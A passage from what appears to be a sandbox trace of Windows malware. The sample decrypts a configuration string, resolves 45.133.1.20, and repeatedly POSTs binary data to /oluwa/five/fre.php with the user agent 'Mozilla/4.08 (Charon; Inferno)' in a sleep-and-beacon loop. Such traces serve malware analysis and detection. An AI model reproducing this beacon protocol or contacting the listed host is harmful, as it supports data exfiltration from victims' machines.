Size=0xb3) returned 0x6bb458 [0203.390] GetProcessHeap () returned 0x6a0000 [0203.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0203.391] GetProcessHeap () returned 0x6a0000 [0203.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0203.391] GetProcessHeap () returned 0x6a0000 [0203.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0203.392] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0203.393] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0203.393] GetProcessHeap () returned 0x6a0000 [0203.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0203.393] GetProcessHeap () returned 0x6a0000 [0203.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0203.394] send (s=0x558, buf=0x6b5c98*, len=242, flags=0) returned 242 [0203.394] send (s=0x558, buf=0x6bb998*, len=159, flags=0) returned 159 [0203.395] GetProcessHeap () returned 0x6a0000 [0203.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0203.395] recv (in: s=0x558, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0203.572] GetProcessHeap () returned 0x6a0000 [0203.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0203.572] GetProcessHeap () returned 0x6a0000 [0203.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0203.573] GetProcessHeap () returned 0x6a0000 [0203.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0203.574] GetProcessHeap () returned 0x6a0000 [0203.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0203.574] closesocket (s=0x558) returned 0 [0203.575] GetProcessHeap () returned 0x6a0000 [0203.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baac0 | out: hHeap=0x6a0000) returned 1 [0203.575] GetProcessHeap () returned 0x6a0000 [0203.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0203.575] GetProcessHeap () returned 0x6a0000 [0203.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0203.575] GetProcessHeap () returned 0x6a0000 [0203.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0203.576] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc54) returned 0x558 [0203.578] Sleep (dwMilliseconds=0xea60) [0203.579] GetProcessHeap () returned 0x6a0000 [0203.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0203.580] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0203.581] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0203.587] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0203.587] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0203.593] GetProcessHeap () returned 0x6a0000 [0203.593] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0203.594] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0203.594] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0203.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0203.595] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0203.596] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0203.596] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0203.597] GetProcessHeap () returned 0x6a0000 [0203.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0203.690] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0203.691] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0203.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0203.727] CryptDestroyKey (hKey=0x6ad060) returned 1 [0203.728] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0203.728] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0203.728] GetProcessHeap () returned 0x6a0000 [0203.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0203.729] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0203.729] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0203.730] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0203.730] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0203.731] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0203.732] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0203.732] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0203.733] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0203.733] GetProcessHeap () returned 0x6a0000 [0203.733] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0203.733] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0203.733] GetProcessHeap () returned 0x6a0000 [0203.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0203.734] GetProcessHeap () returned 0x6a0000 [0203.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0203.734] GetProcessHeap () returned 0x6a0000 [0203.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0203.734] GetProcessHeap () returned 0x6a0000 [0203.734] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0203.735] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0203.735] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0203.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0203.848] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0203.906] GetProcessHeap () returned 0x6a0000 [0203.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0203.907] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0203.907] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0203.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0203.908] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0203.909] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0203.909] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0203.909] GetProcessHeap () returned 0x6a0000 [0203.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0203.977] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0203.977] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0203.979] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0203.979] CryptDestroyKey (hKey=0x6ad020) returned 1 [0203.980] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0203.980] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0203.980] GetProcessHeap () returned 0x6a0000 [0203.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0203.981] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0203.981] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0203.982] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0203.982] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0203.983] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0203.983] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0203.984] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0203.984] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0203.984] GetProcessHeap () returned 0x6a0000 [0203.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0203.984] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0203.984] GetProcessHeap () returned 0x6a0000 [0203.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab10 [0203.984] socket (af=2, type=1, protocol=6) returned 0x55c [0203.985] connect (s=0x55c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0204.009] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0204.009] GetProcessHeap () returned 0x6a0000 [0204.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0204.009] GetProcessHeap () returned 0x6a0000 [0204.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c5ef0 [0204.009] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0204.010] wvsprintfA (in: param_1=0x6c5ef0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0204.010] GetProcessHeap () returned 0x6a0000 [0204.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0204.010] GetProcessHeap () returned 0x6a0000 [0204.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0204.011] GetProcessHeap () returned 0x6a0000 [0204.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0204.011] GetProcessHeap () returned 0x6a0000 [0204.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c5ef0 [0204.012] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0204.012] wvsprintfA (in: param_1=0x6c5ef0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0204.012] GetProcessHeap () returned 0x6a0000 [0204.012] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0204.012] GetProcessHeap () returned 0x6a0000 [0204.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0204.013] send (s=0x55c, buf=0x6b5c98*, len=242, flags=0) returned 242 [0204.013] send (s=0x55c, buf=0x6bb998*, len=159, flags=0) returned 159 [0204.013] GetProcessHeap () returned 0x6a0000 [0204.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0204.014] recv (in: s=0x55c, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0204.087] GetProcessHeap () returned 0x6a0000 [0204.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0204.088] GetProcessHeap () returned 0x6a0000 [0204.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0204.088] GetProcessHeap () returned 0x6a0000 [0204.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0204.089] GetProcessHeap () returned 0x6a0000 [0204.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0204.090] closesocket (s=0x55c) returned 0 [0204.090] GetProcessHeap () returned 0x6a0000 [0204.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab10 | out: hHeap=0x6a0000) returned 1 [0204.090] GetProcessHeap () returned 0x6a0000 [0204.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0204.091] GetProcessHeap () returned 0x6a0000 [0204.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0204.091] GetProcessHeap () returned 0x6a0000 [0204.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0204.092] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x680) returned 0x55c [0204.094] Sleep (dwMilliseconds=0xea60) [0204.099] GetProcessHeap () returned 0x6a0000 [0204.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0204.100] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.111] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0204.121] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.124] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0204.134] GetProcessHeap () returned 0x6a0000 [0204.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0204.135] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.136] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0204.137] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.137] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0204.138] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.138] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0204.138] GetProcessHeap () returned 0x6a0000 [0204.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0204.146] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.147] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0204.148] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.148] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0204.149] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.150] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0204.150] GetProcessHeap () returned 0x6a0000 [0204.150] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0204.150] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0204.151] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0204.152] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0204.152] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0204.153] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0204.153] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0204.154] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0204.155] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0204.155] GetProcessHeap () returned 0x6a0000 [0204.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0204.155] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0204.156] GetProcessHeap () returned 0x6a0000 [0204.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0204.156] GetProcessHeap () returned 0x6a0000 [0204.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0204.157] GetProcessHeap () returned 0x6a0000 [0204.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0204.157] GetProcessHeap () returned 0x6a0000 [0204.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0204.158] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.158] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0204.201] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.201] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0204.211] GetProcessHeap () returned 0x6a0000 [0204.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0204.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.212] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0204.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.213] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0204.214] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.215] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0204.215] GetProcessHeap () returned 0x6a0000 [0204.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0204.216] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.216] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0204.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.218] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0204.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.219] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0204.219] GetProcessHeap () returned 0x6a0000 [0204.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0204.220] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0204.220] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0204.224] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0204.225] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0204.226] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0204.226] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0204.227] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0204.227] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0204.227] GetProcessHeap () returned 0x6a0000 [0204.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0204.227] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0204.227] GetProcessHeap () returned 0x6a0000 [0204.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba990 [0204.228] socket (af=2, type=1, protocol=6) returned 0x560 [0204.228] connect (s=0x560, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0204.275] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0204.275] GetProcessHeap () returned 0x6a0000 [0204.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0204.275] GetProcessHeap () returned 0x6a0000 [0204.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c5ef0 [0204.276] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0204.277] wvsprintfA (in: param_1=0x6c5ef0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0204.277] GetProcessHeap () returned 0x6a0000 [0204.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0204.277] GetProcessHeap () returned 0x6a0000 [0204.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0204.278] GetProcessHeap () returned 0x6a0000 [0204.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0204.278] GetProcessHeap () returned 0x6a0000 [0204.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c5ef0 [0204.279] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0204.280] wvsprintfA (in: param_1=0x6c5ef0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: 